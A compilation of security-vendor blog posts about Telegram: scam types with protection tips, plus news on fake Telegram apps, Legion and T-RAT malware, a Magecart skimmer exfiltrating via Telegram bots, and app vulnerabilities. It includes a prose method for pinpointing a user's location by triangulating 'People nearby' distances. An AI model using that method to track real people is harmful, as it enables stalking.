Protection Tips:

• Be skeptical of investment advice that creates artificial time pressure
• Research the track record of any investment group before participating
• Avoid cryptocurrencies with very low market capitalization and trading volume
• Remember that coordinated price manipulation schemes are illegal in most jurisdictions

9. Fake Job Offers on Telegram

Job scams have proliferated across professional networking platforms, with many now incorporating Telegram as part of their operation. Scammers post attractive job listings with appealing salaries and flexible working conditions, requiring only that interested applicants contact a “hiring manager” through Telegram.

Once in contact with the supposed hiring manager, victims may be asked to:

• Provide sensitive personal information like Social Security numbers or banking details
• Pay for training materials, software, or equipment
• Complete “test projects” that actually constitute unpaid work
• Cash fraudulent checks and return portions of the funds

How to Identify Fake Job Scams

Most fake job scams follow a similar pattern: the terms are too good to be true, the interview process is unusually brief or informal, and communication shifts quickly to Telegram. While legitimate employers might request personal information like Social Security numbers, this typically occurs after a formal offer and through secure, official channels—not via messaging apps.

Protection Tips:

Watch for common indicators that a job offer is fraudulent, such as abbreviated interview processes, immediate job offers, or requests for payment. Never provide sensitive personal information until you’ve verified the legitimacy of the employer and received an official employment contract.

10. “Friend in Need” Scams

In “friend in need” scams, criminals gather information about your contacts from social media or data breaches, then impersonate these individuals on Telegram to request emergency financial assistance. They might claim to be in dire circumstances, such as being stranded while traveling, involved in an accident, or facing unexpected medical bills.

How to Identify “Friend in Need” Scams

Pay attention to the language and communication style. Does it match how your friend typically communicates? Are there unusual phrases or grammatical structures that seem out of character? Additionally, consider the urgency of the request—would your friend typically ask for financial help without providing context or through a messaging platform rather than a phone call?

Protection Tips:

• Verify the request by contacting your friend through another communication channel
• Ask personal questions that only the real person would know (and that aren’t available on social media)
• If you confirm it’s a scammer, block the account and alert the real person about the impersonation
• Inform mutual friends about the scam to prevent them from becoming targets

11. Telegram Romance Scams

Romance scams involve criminals establishing romantic relationships with victims to exploit their emotions for financial gain. On Telegram, these scams often focus on developing quick emotional connections and requesting financial assistance or explicit content that can later be used for blackmail.

Common scenarios include:

• Scammers claiming they need money for emergencies, travel expenses, or visa applications to visit the victim
• Requests for gift cards or digital payments to overcome supposed obstacles
• Soliciting compromising photos or videos, which are then used for blackmail
• Creating elaborate backstories about being wealthy but temporarily unable to access funds

One Reddit user described an interaction with a scammer on Telegram who claimed she couldn’t meet because she was babysitting and requested a Steam gift card to keep the children occupied. Gift cards are particularly popular in scams because they function as untraceable currency.

How to Identify Romance Scams

Romance scammers typically avoid in-person meetings and video calls, providing various excuses for why they can’t connect face-to-face. They often attempt to escalate emotional intimacy rapidly, sometimes sending intimate photos (usually stolen from other accounts) to encourage reciprocation. The most telling sign is when they begin requesting money or financial assistance.

Protection Tips:

• Never send money to someone you’ve only met online, regardless of their story
• Be cautious about sharing personal information, even seemingly innocent details about your family or work
• Insist on video calls before developing serious emotional connections
• Perform reverse image searches on profile pictures to check if they’ve been stolen from elsewhere

Complete Telegram Scam Prevention Guide

Protecting yourself from Telegram scams requires vigilance and proper security practices. Here are comprehensive strategies to safeguard your information and finances:

Optimize Your Telegram Security Settings

• Enable two-step verification (2FA) – Add an additional password for accessing your account
• Configure privacy settings – Limit who can see your phone number, add you to groups, or call you
• Set up passcode lock – Add a PIN or biometric authentication for accessing the app
• Enable login notification alerts – Get notified when your account is accessed from a new device
• Create a strong password – Use a unique, complex password combining uppercase and lowercase letters, numbers, and symbols
• Use a password manager – Consider using a password manager to generate and store strong, unique passwords

General Security Practices

• Verify before trusting – Never trust unsolicited messages, even if they appear to come from friends
• Use secret chats – For sensitive conversations, use Telegram’s end-to-end encrypted secret chat feature
• Keep your app updated – Always install the latest Telegram updates to benefit from security improvements
• Be skeptical of links – Avoid clicking links from unknown sources or those that seem suspicious
• Never share verification codes – Legitimate organizations will never ask for Telegram login codes
• Maintain current contact information – Keep your phone number up to date to facilitate account recovery
• Report suspicious activity – Use Telegram’s reporting features to flag scammers and fraudulent groups
• Check usernames carefully – Verify the exact spelling of usernames, as scammers often use similar-looking characters

By implementing these security measures and staying informed about the latest scam tactics, you can enjoy Telegram’s communication benefits while minimizing your risk of falling victim to fraud. Remember that new scam methods emerge regularly, so maintaining a healthy skepticism toward unsolicited contacts and offers is your best defense.

The post Top 11 Telegram Scams in 2025: Complete Protection Guide appeared first on Gridinsoft Blog.

Trojanized Telegram Clients Spread on Google Play

Telegram’s Play Store version is identified with the package name "org.telegram.messenger," while the direct APK file downloaded from Telegram’s website is associated with the package name "org.telegram.messenger.web". Malicious packages named “wab,” “wcb,” and “wob” were used by threat actors to trick users into downloading fake Telegram apps. Despite looking like the authentic Telegram app with a localized interface, infected versions contained an additional module. That was missed by Google Play moderators. A few days ago, experts revealed that a malware campaign called BadBazaar was using such rogue Telegram clients to gather chat backups.

Examples of fake Telegram apps:

Security experts have recently discovered a number of malicious apps on Google Play that claim to be versions of Telegram in Uyghur, Simplified Chinese, and Traditional Chinese languages. These apps have descriptions written in their respective languages and contain images that are very similar to the official Telegram page on Google Play, making it difficult to distinguish them from the genuine app.

The devs of these fake apps promote them as a faster version of a regular client, citing a distributed network of data centers worldwide. They use this as bait to persuade users to download the mods instead of the official Telegram app.

How dangerous are fake Telegram apps?

Millions of users have downloaded apps that were found to have malicious features. Among other things, malicious copies have functionality to capture and transmit sensitive information such as names, user IDs, contacts, phone numbers and chat messages to a server controlled by an unknown actor. Experts who discovered this activity have codenamed it Evil Telegram. Google has since taken down these apps from its platform.

Nonetheless, the poor app moderation problem in Google Play has persisted for almost a decade. You can upload literally whatever you want – even malware – and it may be deleted only after numerous reports saying it is malicious. And there’s still no guarantee that the reports will be processed in a suitable time; some rogue apps remain in GP for months. For that reason, the threat will most probably resurface later, especially considering the growing popularity of Telegram.

How to stay safe?

Here are some important tips to keep yourself safe from infected versions of popular messaging apps and other threats that target Android users:

• As I’ve just said, Google Play isn’t completely immune to malware attacks. However, it’s still a much safer option than other sources, so always download and install apps from official stores.
• Before installing any app, even from official stores, please take a closer look at its page and ensure it’s legitimate. Pay attention to the app’s name and developer. Cybercriminals frequently apply typosquatting or spoofing in order to spread their malware.
• Reading negative user reviews is a good way to identify potential issues with an app. If there’s a problem with an app, someone has likely already written about it. Also try searching for reviews on the web. There are plenty of sites where you can leave your feedback without any censorship from the developer or Google. Using several independent sources will give a more clear view.

The post Spyware in Fake Telegram Apps Infected Over 10 million Users appeared first on Gridinsoft Blog.

Let me remind you that we also wrote that Microsoft Told How To Detect The Installation Of The BlackLotus UEFI Bootkit, and also that Experts discovered ESPecter UEFI bootkit used for espionage.

Attacks with Legion Hacker Tool

According to Cado Labs researchers, the Legion malware has modules for enumerating vulnerable SMTP servers, conducting remote code execution (RCE) attacks, exploiting unpatched versions of Apache, brute force cPanel and WebHost Manager (WHM) accounts, as well as interacting with the Shodan API and abusing AWS services.

The researchers say the malware shares similarities with another malware family, AndroxGh0st, which was first discovered by cloud security provider Lacework in December 2022.

Last month, SentinelOne published an analysis of AndroxGh0st, which showed that the malware is part of the AlienFox toolkit, which is offered to criminals to steal API keys and secrets from cloud services.

In addition to using Telegram to extract data, Legion is designed to hack web servers with CMS, PHP, or PHP-based frameworks such as Laravel.

Other targeted services include SendGrid, Twilio, Nexmo, AWS, Mailgun, Plivo, ClickSend, Mandrill, Mailjet, MessageBird, Vonage, Exotel, OneSignal, Clickatell, and TokBox.

In addition, Legion extracts AWS credentials from insecure or misconfigured web servers and sends spam SMS to users of US operators, including AT&T, Sprint, T-Mobile, Verizon, and Virgin.

What’s the matter?

The main goal of the malware is to use the infrastructure of hijacked services for subsequent attacks, including bulk spam mailings and opportunistic phishing campaigns.

The researchers also discovered a YouTube channel (created June 15, 2021) containing tutorial videos on Legion. Experts conclude that “the tool is widespread and most likely is paid malware.”

The location of the creator of this tool, who uses the Telegram nickname forzatools, remains unknown, although the presence of comments in Indonesian in the code indicates that the developer may be Indonesian or located in that country.

The post Legion Hacker Tool Used to Steal Data from Poorly Protected Websites appeared first on Gridinsoft Blog.

The resulting document contains training tips for agents and explains what kind of data can be obtained from the operators of various messengers and what legal permissions will be required for this.

The document is dated January 7, 2021, and, in general, does not contain any fundamentally new information, but it gives a good idea of what information the FBI can currently receive from services such as Message, Line, WhatsApp, Signal, Telegram, Threema, Viber, WeChat and Wickr.

In general, the training document confirms that usually the FBI cannot access the encrypted messages themselves, but they can request other types of information that can also be useful in investigations.

Let me remind you that I also reported that FBI removed web shells from vulnerable Microsoft Exchange servers without informing owners.

The post Unlocking the Secrets of Messaging Apps: An In-Depth FBI Study Guide on Accessible Data for Law Enforcement appeared first on Gridinsoft Blog.

Let me remind you that in the secret chat mode, you cannot forward messages to other users, and it is also possible to configure automatic self-destruction of all messages and multimedia after a certain time.

Independent information security specialist Dhiraj Mishra discovered that in Telegram version 7.3, self-destructing messages were not completely deleted from the recipient’s device.

So, the expert noticed that on macOS standard chats escape the sandbox path, where all received video and audio files are stored. Although this path works in secret chats, the received media files are still stored there, even if the messages in the chat itself have already destructed themselves, as they should have.

Additionally, Mishra discovered that Telegram was storing local access codes to unlock the app in plain text format. They were saved in the Users/[username]/Library/GroupContainers/6N38VWS5BX.ru.keepcoder.Telegram/accounts-metadata folder as JSON files.

The researcher discovered both problems at the end of December 2020, and they were fixed with the release of Telegram 7.4. Mishra received a reward of $3,000 for reporting both errors.

Let me remind you that I also reported that a researcher discovered vulnerability in Telegram, which allows to locate user.

The post Telegram for macOS did not delete self-destructing videos appeared first on Gridinsoft Blog.

Enthusiast Ahmed Hasan posted a message about the vulnerability found on his blog.

Several years ago, he already reported a similar flaw to the Line messenger development team. The creators of the messenger paid Hassan a bonus of $ 1,000 and fixed the problem.

Although Telegram only shows the distance to a particular user in the list, you can determine its exact location using triangulation.

To do this, you need to change your location twice, marking each time the distance to the user, and then draw on the map (for example, on Google maps) three circles with a centre in their coordinates and a radius equal to the found distance. The user will be at the intersection of the circles.

Let me remind you, by the way, that Researcher Earned $10,000 by Finding XSS Vulnerability in Google Maps.

At the same time, can be found only those users, who use the “People nearby” function.

It should be noted that alternative solutions in other applications for calculating the distance between users include the addition of a random number to the coordinates, which makes impossible determining the real geolocation, but in the case of Telegram, the developers decided to neglect this additional security measure.

The post Researcher discovered vulnerability in Telegram, which allows to locate user appeared first on Gridinsoft Blog.

Malware creators claim that this provides faster and easier access to infected computers from anywhere, and allows them to quickly steal data. However, T-RAT can also be controlled by more traditional methods, for example via RDP and VNC.

In addition, T-RAT owners can use a special mechanism for capturing data from the clipboard, which replaces strings similar to addresses of cryptocurrency and electronic wallets with the addresses of attackers. This allows successfully intercepting Qiwi, WMR, WMZ, WME, WMX, Yandex.Money, Payeer, CC, BTC, BTCG, Ripple, Dogecoin and Tron transactions.

The malware is also capable of working with terminal commands (CMD and PowerShell), blocking the victim’s access to certain sites (for example, antivirus and technical support sites), eliminating specific processes (disabling security and debugging software), and even deactivating the Taskbar and Task Manager.

G DATA experts write that T-RAT is just one of many families of malware that are equipped with the ability to control via Telegram, and this is not the first RAT that operates on such a model. So, similar functionality is possessed by: RATAttack (targeting Windows), HeroRAT (targeting Android), TeleRAT (used mainly against users from Iran, targeting Android), IRRAT (targeting Android), RAT-via-Telegram (available at GitHub, targeting Windows users) and Telegram-RAT (available on GitHub, targeting Windows users).

Let me remind fans of classic horror stories about viruses and monsters that Alien malware that steals passwords from 226 Android apps.

The post New T-RAT malware can be controlled via Telegram appeared first on Gridinsoft Blog.

He concluded this based on information obtained by Sansec, which specializes in combating digital skimming and Magecart attacks.

Let me remind you that initially the name MageCart was assigned to one hack group, which was the first to introduce web skimmers (malicious JavaScript) on the pages of online stores to steal bankcard data.

“Such an approach was so successful that the group soon had numerous imitators, and the name MageCart became a common name, and now it refers to a whole class of such attacks”, – remind history specialists of the information security company RiskIQ.

If in 2018 RiskIQ researchers identified 12 such groups, then by the end of 2019, there were already about 40 of them.

The researcher studied one of these malicious JavaScript and noticed that it collects all data from the input fields filled by victims and sends it to Telegram.

All transmitted information is encrypted using a public key, and having received it, a special Telegram bot sends the stolen data to the chat in the form of ordinary messages.

Affable Kraut notes that this method of data theft, apparently, is very effective, but it has a significant disadvantage: anyone who has a token for a Telegram bot can take control of the process.

Malwarebytes’ leading researcher, Jérôme Segura, was also interested in the script, and after examining it, he said that the author of this web skimmer used a simple Base64 for the bot ID, Telegram channel and API requests. Below you can see the diagram left by Segura and describing the entire attack process.

The researcher notes that data theft occurs only if the current URL in the browser contains one of the keywords indicating that this is an online store, and only when the user confirms the purchase. The payment details will then be sent to both the payment processor and the cybercriminals.

Jerome Segura writes that such a data extraction mechanism is a very practical solution, because it allows attackers not to worry about creating a special infrastructure for these purposes. In addition, it will not be easy to defend against this type of skimmer. Blocking Telegram connections will be only a temporary solution, since then the attackers can start using another legitimate service, which will also mask the “leak” of data.

Segura writes that such data extraction mechanism is a very practical solution, because it allows attackers not to worry about creating a special infrastructure for these purposes. In addition, it will not be easy to defend against this type of skimmer. Blocking Telegram connections will be only a temporary solution, since then the attackers can start using another legitimate service, which will also mask the “leak” of data.

Let me remind you that scientists have developed an attack that allows not to enter a PIN code while paying with Visa cards.

The post Magecart groupings extract stolen cards data via Telegram appeared first on Gridinsoft Blog.